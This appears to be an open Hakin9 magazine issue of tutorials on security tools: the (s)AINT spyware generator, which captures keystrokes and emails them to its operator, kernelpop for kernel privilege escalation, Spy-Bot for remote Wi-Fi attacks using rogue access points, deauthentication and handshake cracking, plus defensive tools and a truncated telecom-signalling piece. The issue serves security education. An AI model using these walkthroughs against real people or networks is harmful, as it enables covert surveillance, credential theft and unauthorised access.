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Dear Readers! 

Welcome to new and free edition of Hakin9. Warmest thoughts and best wishes 

for a wonderful Holiday and a Happy New Year. May peace, love and prosperity 

follow you always!

Last year when we published an OPEN edition of Hakin9 we invited specialists 

from cybersecurity field, so they could presented their opinions and experience. 

This time we decided to do something else. Having a good tool, software is one 

of the most important part of being a hacker or pentester. This edition is fo-

cused on various Open Source tools, created by the the most amazing people 

from cybersecurity field. Each one of them, prepared a tutorial that explains 

who its tool works and what it can do. We hope that you will learn a lot of new 

things and improve your skills. 

We would also want to thank every author for participating in this project. We 

appreciate it a lot. If you like this publication you can share it and tell your 

friends about it! every comment means a lot to us. Thank you and Happy New 

Year!

Enjoy the issue, 

Hakin9 Team
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First of all...what is Spyware?

Spyware is a generic name given to programs that contain the functionality of secretly monitoring a user activity on 

your computer or device. They can be used for some perfectly legitimate purposes, but the majority of spyware is mali-

cious.

Ok, so what is (s)AINT?!

      

The (s)AINT is a Spyware Generator Open Source for Windows systems written in Java and was created only for good 

purposes and personal use.

It has some features like:

✓Keylogger

✓Take Screenshot

✓Webcam Capture

✓Persistence on target system

Tested On

The Operating System used was Kali Linux - Rolling Edition (www.kali.org).

How to Use

As it is written in Java, it is necessary to install some dependencies on the system so that we can 

generate spyware.

Follow the steps to configure dependencies on operating system.

We must install JRE 8, JDK 8 and Maven packages:
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To generate an .EXE using launch4j the following packages are necessary:

Getting (s)AINT: www.github.com/tiagorlampert/sAINT

Go into the repository:

Install and configure Maven libraries:

Run (s)AINT:
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Press [ENTER] to continue:

You need a Gmail account and it is necessary to allow access to less secure apps on your Gmail account to send e-mail. 

Follow the steps to generate the spyware:
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Within the target/ folder, two files were generated, saint-1.0-jar-with-dependencies.exe and 

saint-1.0-jar-with-dependencies.jar, which should be copied to the target machine. 

Configure target machine
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On target machine running Windows, install the latest Java JRE 8 from Oracle (www.java.com). The JRE is required 

and the executable will not work without it because Windows needs JRE for translating the program from Java bytecode 

to machine language.

Some Notes

• E-mail will be sent when it reaches the specified number of characters.

• Optionally, you can enable Screenshot, Webcam Capture and Persistence.

Run Spyware

To run the .EXE double-click the executable.
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To run .JAR run on command prompt “java -jar saint.jar”.

Keep data

If the option Keep data on the computer was enabled, the data will be saved on (s)AINT folder in %APPDATA%.

The data will be sent to the specified email.
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How to uninstall

To uninstall (s)AINT from your operating system, run the UNINSTALL.bat file available on the repository with admin-

istrative permissions.

UNINSTALL.bat

Contributing

This project was written under BSD 3-Clause License, if you would like to contribute please contact me by email 

tiagorlampert@gmail.com or open an issue in https://github.com/tiagorlampert/sAINT.
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KERNELPOP
by coastal
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"kernelpop" is an open-source framework, written in Python, for performing automated kernel vulnerability enumera-

tion and exploitation. At the moment of writing, it supports over 25 root exploits for both Linux and macOS. The 

framework itself is extensible by design, allowing for anyone to add their own exploits and perform a pull request to 

share exploit functionality with the community, or add to their own private fork.

The author's motivation for writing the tool stemmed from, "kernel exploitation with public exploits being more of an 

exercise in search engine navigation than anything else". The idea was to create a tool that removed the redundancy of 

searching for exploit after exploit and instead offering an encompassing way to check for available public exploits 

against a given operating system kernel.

Using "kernelpop" is simple. Enumeration of a target system can be performed with the command `python3 

kernelpop.py`.

This automatically checks the base kernel version, while pulling more detailed information about the system (such as 

Linux flavor, patch level, etc.). This information is checked against all available exploits in the framework for the given 

kernel ecosystem (Linux, Mac, or Windows), and any resulting matches for vulnerabilities are printed to the terminal.

Exploiting a host using a discovered vulnerability is equally as simple. The command `python3 kernelpop.py -e {ex-

ploit}`, where `{exploit}` is the name of one of the enumerated exploits, will perform automated exploitation of the 

system. The particulars of this process depend on the exploit, but can range from pre-checking the system to ensure 

that it satisfies the necessary prerequisites for vulnerable, to compilation and execution of the source code.
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Successful exploitation normally leads to an interactive shell in the terminal. Any other successful conditions, such as 

overwrite of password files or embedded backdoors, are noted in the execution of the exploit.

"kernelpop" is a powerful, extensible tool for performing automated kernel exploitation. Windows support is not cur-

rently included, but is planned as a roadmap feature in future updates. If you would like to contribute to "kernelpop" 

be it in the form of tests, functionality, or expanded exploits, please issue a pull request to the project. It can be found 

at https://github.com/spencerdodd/kernelpop. 

Thank you and happy hacking!
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SPY-BOT: A 
CLOUD 
PENTESTING 
APPROACH
by Aamer Shareef



Spy-Bot: A Cloud Pentesting Approach

Sit back in your room and pentest wireless networks anywhere in the world over the cloud!

The Spy-Bot is a robot based on a Raspberry Pi build using Python, which can navigate and perform wireless penetra-

tion testing over the cloud. The Spy-Bot works with a Spy-Bot framework, which constitutes the source code and files 

needed to perform wireless penetration testing objectives using Python scripts.

22

Spy-Bot: A Cloud Pentesting Approach

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


The SpyBot framework provides a convenient approach to perform RED-TEAM exercises aimed to perform penetra-

tion tests on wireless networks in a particular region. The framework contains remote admin scripts used by a remote 

admin (Admin WorkSpace) and Spy-Bot scripts used on the Raspberry Pi (SpyBot Workspace) to perform remote wire-

less penetration testing over the cloud.

The Spy-Bot framework contains tools developed and designed to gather geographical information regarding wireless 

access points, detect wifi signal leakage by plotting geo-coordinates of a wireless AP packets on Google maps and per-

form several other attack objectives. The Spy-Bot framework sets up a database that stores information related to the 

wireless pentests and audits performed using the Spy-Bot.

This wireless pentest framework is designed specifically to work efficiently with a Raspberry Pi. The source files for per-

forming wireless penetration testing objectives (present in the SpyBot Workspace) can also be used on a standalone 

individual system that runs Kali Linux or a similar distro. The source codes have been designed and tested to work 

with a TP-Link WN-722N (use SpyBotmian.py in the master branch) and ALFA cards (check SpyBotMain_alfa.py to 

work with other cards and ALFA cards).

OBJECTIVES OF THE SPY-BOT:

1. Deploying the Spy-Bot:

• Remotely connecting to the Spy-Bot using Python. (Using Yaler Services https://yaler.net/. Setup the Yaler 

services on the Raspberry Pi for auto start by checking out the official documentation on the Yaler website. 

Place your Yaler files in the Admin Workspace)
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• Remotely controlling and navigating the Spy-Bot using Python. (Run the navigation.py on the Raspberry Pi)

2. Testing Attacks against WPA/WPA2/WPA-Enterprise Networks (Objectives done using 
SpyBotMain.py and SpyBotMain_alfa.py)

• Passively deauthenticate connected clients to an AP using Python & Scapy.

• Detect WPS status of APs.

• Force Handshake Capturing while Deauthenticating using Python & Scapy.

• GPU accelerated PSK cracking using Pyrit using custom Wordlists. (Place your Wordlists in the Admin Work-

space Directory. Check out the basic layout figures to setup the Admin Workspace)

3. Testing Attacks against WEP Networks

• Passively deauthenticate connected clients to an AP using Python & Scapy.

• Collect AP data packets using Python & Scapy.

• Acquire WEP Network Key.

4. Testing Attacks against Authentication Protocols

• Using Python to leverage vulnerabilities in EAP-LEAP/PEAP/TTLS/MD5 to obtain challenge & response pairs 

during misconfigured authentications.

• Using ASLEAP, EAPMD5PASS and custom wordlists to perform dictionary brute-forcing to acquire weak pass-

words used by clients.

5. Dynamically Hosting Rogue APs for victim clients

• Using Python and hostapd to:

• Hosting a rogue AP (Open networks or WPA-Enterprise Networks) based on the Access points in a region or 

creating a custom AP.

• Dynamically selecting and hosting the Strongest AP in a region.

• Hosting a rogue AP based on selection of available APs.

• Hosting Rogue APs in karma mode.

NEW FEATURES WILL BE ADDED SOON :) !

24

Spy-Bot: A Cloud Pentesting Approach

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


INSTALLATION

1. Setting up the CLOUD System/Command & Control Center

• The remote system/C2C System is used to connect & control the Spy-Bot remotely over the internet.

• Place the contents of the Admin_Workspace onto the system that you wish to use as a Remote System.

• If you are SSHing into the Spy-Bot remotely using Yaler, make sure to add the Yaler relay node in the 

admin.py.

• The remote system must have aircrack-ng, optirun, bumblebeed and pyrit installed.

• The remote system must be running a suitable OS such as Kali Linux. (Tested on Parrot OS).

2. Setting up the Spy-Bot

• Refer to the wiki to setup the SPyBot motor controller, GPIO Connection and Circuit connections.

• Make sure you have configured the Yaler services to run on and boot on the Raspberry Pi (if using a remote con-

nection over the internet).

• Make sure you are using Parrot OS armhf or a similar distro on the Raspberry Pi.

• Install the pygmaps module present in the dependencies folder.

• Install scapy, click, GPS, Google maps and RPi Python modules on the Raspberry Pi (Spy-Bot).

• Create a Google geolocation API and add it to the line key="<insert_api_here>" in locationtest.py. Use a paid 

API to bypass any restrictions if needed (preferred). The script sends an API request for every packet sniffed.

• Connect an NMEA USB GPS device for retrieving geographical coordinates. (I have tested and used GlobSAT 

bu353, which is connected to tty0 by default. Change this value in gpstest.py if needed)

• Connect a suitable wireless card (Tp-Link/ALFA) to the Spybot which supports monitor-mode.

• Ensure the Spy-Bot has a internet connection at boot (Example: a 3g connection. You need to preconfigure it if 

you are deploying the SpyBot remotely)

USE A SUITABLE DATABASE VIEWER (SUCH AS SQLITE MANAGER FIREFOX PLUGIN) TO VIEW THE CON-

TENTS OF THE SPYBOT.DB DATABASE. SAMPLE FILES ARE PROVIDED.

REFER TO THE WIKI PAGE FOR MORE DETAILS & SETTING UP.
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Usage

1. The Spybotmain.py is responsible for performing the wireless pentest objectives. It can be run on a remote com-

mand and control center, or on the Spybot. Make the spybotmain.py as an executable and run with root privileges.

chmod a+x SpyBotMain.py 

./Spybotmain.py <wireless-interface name> 

example: ./Spybotmain.py wlan0

Run the admin.py (as root) if performing objectives remotely.

chmod a+x admin.py

./admin.py 

2. Run navigation.py to control the motors of the Spy-Bot Use the arrow keys or 'a','s','d','w' to control directions. 

Press space key to stop.

chmod a+x navigation.py 

./navigation.py  

Screenshots

1. Connecting to the SpyBot.

On the cloud/C2C system, execute the admin.py script (sudo/root) present in the admin_workspace directory. The 

admin.py allows you to connect to the SpyBot over YALER, launch GPU password attacks on pcap files and retrieves 

any handshake files, rogue AP login detail files, etc., are captured by the SpyBot and stores it in the admin_workspace. 

26

Spy-Bot: A Cloud Pentesting Approach

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


NOTE: root@localhost is the default remote login prompt given to you by Yaler services, if you configure the Yaler 

services properly for the remote connection.

2. Running the spybotmain.py

Once you login to the SpyBot using the admin.py script on the cloud server/remote control system, launch the 

spybotmain.py in the spybot_workspace directory. The spybotmain.py runs on the Raspberry Pi (Spy-Bot) to perform 

wireless penetration testing objectives.

3. Controlling the SpyBot remotely & war-driving over the cloud
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Launch the navigation.py on the SpyBot in the spybot_workspace to control and navigate the spybot. Configure VNC 

camera access if needed (Check Yaler.net for further details). The terminal 1 shows the admin.py on the C2C system. 

The terminal 2 shows the output for the navigation.py (present in the spybot_workspace on the remote rpi) control-

ling the motors on the remote Spy-Bot. The terminal 3 shows the output of spybotmain.py when a network scan is initi-

ated. It shows a list of available wireless networks, channel numbers, etc. The 'coordinates' show the last seen location 

where an access point is detected. The 'location' field provides a description of the coordinates using Google APIs. All 

the collected information about the networks is stored in a database spybot.db on the SpyBot, which can later be re-

trieved at the end of a wireless recon operation.

4. Mapping access points to last seen locations on a map
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The last seen coordinates of the access points are mapped to a Google map template and is stored as an HTML file. 

Move the cursor over the blue points to show information about the access point name, signal strength and encryption 

used.

5. Scanning for client probes
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Launch the client probe scanner using the spybotmain.py to recon the access points which are searched by network de-

vices in the region. When a network device wants to connect to a known saved wireless network, it sends out probes to 

search for the networks it knows. This information can be used to set up rogue access points.

6. Rogue access points and obtaining challenge-response pairs for WPA2-Enterprise networks

Launch the rogue AP launcher in the spybotmain.py to create rogue access points:

• dynamically by selecting the strongest/weakest access point.

• by defining a custom rogue access point.

• hosting rogue access points in karma mode.

Wait for victims to connect and enter credentials (works in WPA-enterprise networks that allow authentication with-

out certificate validation). Launch ASLEAP functions using the admin.py AFTER retrieving the remote files from the 

remote spybot onto the c2c/cloud server.
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7. Deauth selective/all clients and force a WPA handshake

Launch the WPA handshake capture in the spybotmain.py to sniff for EAPOL messages.
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Launch the deauth launcher in the spybotmain.py to deauthenticate all the clients or to select multiple clients to 

deauthenticate the clients.

8. Transfer captured handshakes, mapped APs, spybot.db to the C2C server

Prepare files to send in the spybotmain.py file. Retrieve the files using the admin.py. View the contents of the 

spybot.db database using a suitable database viewer (like Firefox SQL plugin).
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Networks and client probes found & collected during the recon by the spybot are stored in the spybot.db database.

9. GPU crack the handshake using pyrit

Launch the GPU password attack using the admin.py on the cloud server after retrieving the sniffed handshakes from 

the SpyBot.

Launch the GPU password attack using the admin.py on the cloud server after retrieving the sniffed handshakes from 

the SpyBot.

Similar operations for cracking WEP networks is also provided by the framework.

Links

1. Yaler Services & setting up Yaler for remote access: https://www.yaler.net/
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1. Setting up optirun, nvidia & pyrit setup on Kali Linux:  

https://www.pcsuggest.com/install-latest-pyrit-0-4-with-cuda-in-kali-linux-debian/

2. Setting up asleap: https://github.com/joswr1ght/asleap

3. Setting up hostapd: https://w1.fi/hostapd/ (copy hostapd executable in the proper hostapd directory)

LICENSE

MIT License

Copyright (c) 2017 Aamer Shareef

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documenta-

tion files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, 

copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom 

the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Soft-

ware.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUD-

ING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PUR-

POSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE 

FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTH-

ERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEAL-

INGS IN THE SOFTWARE.
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FAKE SANDBOX 
PROCESSES 
(FSP) 
Beating malware with 
fake sandbox processes

by Matthias Rosezky
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Beating malware with fake sandbox processes

Chances are high that at the time you are reading this article you’ve already heard of debugging aware malware. Like 

its name suggests, it’s all about malware that knows when it is under observation and thus tries to hide. This is a really 

clever way to make it more difficult to examine malware in test labs but most importantly, not get caught in the first 

place. Now, theoretically, you could use this exact mechanism to protect yourself against malware. That’s where fake 

sandbox processes come in handy. I’m going to give you a quick overview about how to use a tool that creates such 

processes.

Of course, fake sandbox processes are no guarantee that you’ll be safe from malware, it is more like a proof of concept. 

However, it is quite well known that, for example, ransomware like Petya or Bad Rabbit will look for special files and 

not even deploy properly if it finds them. Likewise, there is malware that looks for special processes that suggest a vir-

tual machine – and therefore, is most likely being analyzed by researchers, who it has to hide from. The same is true 

for debugging processes, but obviously, all of this only applies to more advanced malware.

The FSP Tool

To get a tool that creates said sandbox processes, head to https://github.com/Phoenix1747/fake-sandbox. This reposi-

tory contains the bare PowerShell script and all the files necessary for an additional installer and updater to work. You 

can go and grab a release if you want the tool to be installed onto your PC, more about this later on. 

Let’s start with the PowerShell script. To get just that, download the whole repository as a zip archive. The next few 

steps are business as usual - put it in any directory, unzip it and enter the newly created folder. You will see a couple of 

files and folders, all pretty much self explanatory, just ignore the updater folder. The script itself is named ‘fsp.ps1’ and 

is located directly in the root directory.

Now right-click the file and choose ‘Run with Powershell’, or open a command prompt window (no admin rights re-

quired!) and type the following command:

powershell -executionpolicy remotesigned -File "fsp.ps1"

Whatever method you choose to use, the outcome should be something like this:

Now you can choose to either start all the fake processes typing in ‘start’ or ‘stop’ to do the opposite. The script will in-

stantly spawn all processes and the output should look pretty similar to this:
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If you now open your task manager, you’ll see a couple of command prompt processes. But don’t worry, using a pro-

gram like process explorer you will see that these are just the underlying tasks that are executed. The processes them-

selves are correctly named ‘WinDbg.exe’, ‘wireshark.exe’ and so on. That’s all there really is to the script.

So how does this work? At the beginning of the script is the section with all the fake process names. You can add your 

own processes into the array $fakeProcesses, this can be virtually any names you want. The script will then pro-

ceed to copy ping.exe as many times as needed to a temporary directory and rename these copies to the stored names. 

In order for this to run as long as your computer is turned on, this will ping the invalid IP 1.1.1.1 every other hour for 

an unlimited time. This ensures minimum system load while also guaranteeing that the processes don’t disappear. The 

stop argument will just kill everything stated in $fakeProcesses.

The Installer

The problem with the script alone is that it is not permanent, meaning the processes will be gone once you re-login or 

restart, needing you to execute the file again. To make this whole solution easier, I created an installer that automati-

cally puts all the files in the directory %AppData%\Roaming\FakeSandboxProcesses and a small trigger batch 

file in the autostart directory.

To get the installer, you can download a release or just use the one that’s included in the repository’s zip file you down-

loaded earlier. Fittingly, it can be found in the ‘installer’ directory. The installer will guide you through every step, al-

though there really aren’t many.
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Screenshot: Main menu of the FSP installer.

During the installation, you will also be asked if you want to use the automatic updater, which will search for updates 

at launch (that’s where the ‘updater’ folder comes into use). You don’t explicitly need it, but it is recommended.

After the installation has successfully finished, you will need to re-login in order for the script to start working. From 

then on the processes will be automatically spawned each time you start your computer.

Some important notes

If you are using anti-virus software, you might want to white-list the batch file in the autostart directory and the Fake-

SandboxProcesses folder in your AppData directory. Otherwise, the AV might flag it as malware and prevent it from 

executing properly – rendering the whole thing useless. Moreover, the installation is only completed for the current 

user! If you wish to install it for others, you need to install it for each and every additional user.

To wrap things up, fake sandbox processes are an easy way to trick malware into thinking it’s being audited. Debug-

ging aware malware is a challenge for security researchers and anti-virus software, but at the same time it is this pre-

caution that can be used to our advantage. I hope this short tutorial helped you understanding the topic and my tool a 

little better, thanks for reading!
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ARP-
VALIDATOR
Security tool to detect 
ARP poisoning attacks

by Ravinder Nehra



[Hakin9 Magazine]: Hello Ravinder Nehra! Thank 

you for agreeing for the interview, we are hon-

ored! How have you been doing? Can you tell us 

something about yourself?

[Ravinder Nehra]: Thank you Hakin9 Magazine. I’m 

doing great. Currently I’m pursuing my Bachelors in 

Computer Science and Engineering from IIT Roor-

kee. I’m interested in Web Security, Reverse Engi-

neering and Networking. I play CTFs as InfoSecIITR 

regularly. Apart from technical stuff, I spend time 

on cricket and sometimes multiplayer PC games.

[H9]: You play CTFs? Can you tell us about your 

favorite CTF or the most challenging one? Which 

one would you recommend for our readers?

[RN]: VolgaCTF, HITCON, CSAW and SECCON are 

really nice CTFs. Their challenges are focussed on 

real life vulns and I’m talking about web challenges, 

in particular. Apart from these, last year’s SharifCTF 

also had good challenges. And the most challeng-

ing one is DEFCON, of course.

[H9]: Can you tell us more about about your Secu-

rity Tool To Detect ARP Poisoning Attacks?

[RN]: It detects an ARP poisoning attack in a LAN 

using basic properties of the TCP/IP stack. You can 

use it by typing a single command. You can do your 

usual internet stuff and the tool will provide you 

desktop notifications if something bad happens. So 

it is quite user-friendly as you don’t need to keep 

checking your terminal. 

[H9]: What kind of users do you think it’s most 

useful to? Who do you imagine using it?

[RN]: Users who are connected on a network 

mostly in hostels and office buildings sharing a 

LAN.

[H9]: Where did the idea of creating it come 

from?

[RN]: Actually, it was a project under a semester 

course Computer Networks. One of my seniors told 

me they made a tool that can do ARP poisoning at-

tacks as their course project. So this is where I 

thought of making a tool that can detect these at-

tacks.

[H9]: Your tool was an implementation of a re-

search paper by Vivek Ramachandran and Suku-

mar Nandi, how did that affect your working 

process?

[RN]: It doesn’t change much. But now you don’t 

have to think about the correctness of the software. 

So it reduces some work.

[H9]: What was the most challenging part in cre-

ating it?

[RN]: Actually, I chose NodeJS to implement it and 

I was using that for the first time. So right from the 

41

Arp-validator: Security Tool To Detect ARP Poisoning Attacks

http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org
http://hakin9.org


beginning, finding suitable libraries and thinking 

about the architecture of implementation is quite a 

difficult task since it was my first kind of software 

that I’m developing so that others can use it easily. 

But I spent a lot of time in making the module that 

sends TCP SYN packets as I couldn’t find proper 

code for it on the internet so I think that was the 
most challenging part.

[H9]: What about the feedback from github com-

munity? Does it influence your software?

[RN]: The feedback is quite nice. I’ve managed to 

get some stars. And recently someone raised an is-

sue, as well, that means at least someone is using 

it. That’s great.

Well, any software gets better only if people are us-

ing it. So if more people start using it then they 

might experience flaws and I might be able to 

make it better by fixing them.

[H9]: Any plans for the future? Are you planning 

to expand your tool, add new features?

[RN]: Well, there can be some enhancements. I 

might add them myself in future once I find some 

time but they can be added sooner by others if 

more people starting using it and I would like that 

more.

[H9]: Are you currently working on any other pro-

jects you would like to share with our readers?

[RN:] Currently I’m not working on any project. But 

I’m practising Pentesting to try my hands on Bug 

Bounty.

[H9]: Any ideas for future projects?

[RN]: I’m going to study Compiler very soon. So I 

guess I might be making a compiler of my own and 

maybe an emulator as well. Actually we had some 

plans to do this earlier as a CTF challenge for our 

college CTF BACKDOOR but weren’t able to do it. 

So maybe this time I will do it.

[H9]: How can people find you and your work? 

Any contact info you would like to leave here?

[RN]: You can always find my work on  

Github[github.com/rnehra01] and I do have a per-

sonal website kind of thing [rnehra01.github.io]. 

You can find all my contacts there. 

[H9]: Do you have any thoughts or experiences 

you would like to share with our audience? Any 

good advice?

[RN]: It’s not always possible to get a brand new 

idea for a project. So I decided to implement a Re-

search paper and I got to learn stuff I never heard 

about during my whole course of Computer Net-

works, like types of ARP requests and Replies, build-

ing ARP and TCP packets from scratch. Also I chose 

NodeJS which I had never used. So whatever you 

do, just make sure you learn new stuff.
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arp-validator

Security Tool to detect ARP poisoning attacks

Features

• Uses a faster approach in detection of ARP poisoning attacks compared to passive approaches

• Detects not only the presence of ARP Poisoning but also valid IP-MAC mapping (when LAN hosts are using 

non-customized network stack)

• Stores validated host for speed improvements

• Works as a daemon process without interfering with normal traffic

• Logs to any external file

Architecture

1. ARP Packets Sniffer 

It sniffs all the ARP packets and discards

• ARP Request Packets
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• ARP Reply packets sent by the machine itself that is using the tool (assuming host running the tool isn't 

ARP poisoning )

2. Mac-ARP Header Consistency Checker

It matches

• source MAC addresses in MAC header with ARP header

• destination MAC addresses in MAC header with ARP header

If any of above doesn't match, then it will notify you.

3. Spoof Detector

It works on the basic property of TCP/IP stack.

The network interface card of a host will accept packets sent to its MAC address, Broadcast address and subscribed 

multicast addresses. It will pass on these packets to the IP layer. The IP layer will only accept IP packets addressed 

to its IP address(s) and will silently discard the rest of the packets. If the accepted packet is a TCP packet it is passed 

on to the TCP layer. If a TCP SYN packet is received then the host will either respond back with a TCP SYN/ACK 

packet if the destination port is open or with a TCP RST packet if the port is closed.  

So there can be two type of packets:

• RIGHT MAC - RIGHT IP

• RIGHT MAC - WRONG IP (Spoofed packet)

For each consistent ARP packet, we will construct a TCP SYN packet with destination MAC and IP address as adver-

tised by the ARP packet with some random TCP destination port and source MAC and IP address is that of the host 

running the tool.

If an RST (port is closed) or ACK (port is listening) within TIME LIMIT is received for the SYN then host (who sent 

the ARP packet) is legitimate.

Else No response is received within TIME LIMIT so host is not legitimate and it will be notified.

4. Notifier

It provides desktop notifications in case of ARP spoofing detection.
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Installation

npm

[sudo] npm install arp-validator -g

source

git clone https://github.com/rnehra01/arp-validator.git 
cd arp-validator  

npm install  
Use the binary in bin/ to run  

Usage

[sudo] arp-validator [action] [options]  
 

actions:  

 
 start  start arp-validator as a daemon 
 

  options: 

   --interface, -i 

    Network interface on which tool works 
    arp-validator start -i eth0 or --interface=eth0 
 

   --hostdb, -d 

    stores valid hosts in external file (absolute path) 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    arp-validator start -d host_file or --hostdb=host_file 
 

   --log, -l 
    generate logs in external files(absolute path) 
    arp-validator start -l log_file or --log=log_file 

 

 

 stop  stop arp-validator daemon 

 

 

 status  get status of arp-validator daemon 

 

 

global options:  

 

 --help, -h 

  Displays help information about this script 

  'arp-validator -h' or 'arp-validator --help' 

 

 --version 

  Displays version info 

  arp-validator --version 

Dependencies

• libpcap-dev: library for network traffic capture

• node-pcap/node_pcap

• stephenwvickers/node-raw-socket

• indutny/node-ip

• scravy/node-macaddress

• codenothing/argv
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• niegowski/node-daemonize2

• mikaelbr/node-notifier

Issues

Currently, it is assumed that hosts are using non-customized network stack hence the malicious host won't respond 

the TCP SYN packet. But in case the malicious host is using a customized network stack, it can directly capture the 

TCP SYN packet from layer 2 and can respond with a self-constructed TCP RST or ACK hencour tool will validate the 

malicious host.

 If a host is using a firewall that allows TCP packets for only some specific ports, in that case a legitimate host also 

won't respond to the TCP SYN packet and tool will give a False Positive of ARP Poisoning Detection.

References

Vivek Ramachandran and Sukumar Nandi, “Detecting ARP Spoofing: An Active Technique”
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SigPloit:Your Way through the “Telecom Backyard”

Introduction

For the past few years, researchers have been highlighting the risks and vulnerabilities in the signaling protocols that 

are used by mobile networks to facilitate the second to second operations, whether it was mobility, voice, sms, charg-

ing, etc.

Those vulnerabilities have widened our view regarding the mobile security domain to include not only the mobile appli-

cation or the user side but to be extended to the infrastructure of the operator itself. 

Inspired by the research done, and still in progress in this field, came the idea to initiate a penetration testing frame-

work dedicated to signaling exploitation. The main aim was to release it as an open source tool to help mobile opera-

tors to educate themselves more and be able to conduct their own testing.

Although there could be other respectful tools out there hitting the same issue but their main focus was only on SS7. 

SigPloit aims to address all signaling protocols comprehensively independent of the mobile generation whether it was 

2G/3G or 4G.

Next we will discuss briefly a few of the signaling protocols, the important nodes involved, their vulnerability and a pos-

sible attack scenario.

SS7

It is important to have a look first at the network architecture, and where SS7 is used in the network.

Fig 1. 2G/3G Architecture (Source: Locate,track,manipulate. Tobias Engel)
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There are several essential nodes and their functions with which you need to be familiarized. Let's start with 3G archi-

tecture.

Home Location Register (HLR): Each operator has one or more HLR depending on its capacity. In the HLR opera-

tor's database, each subscriber’s profile/info is stored in only one HLR. The HLR holds the below critical info:

• IMSI

• IMEI

• MSISDN

• Authentication keys of subscriber

• Subscriber latest location

• subscription profile

• Services allowed (call forwarding, barring,..etc) ..etc

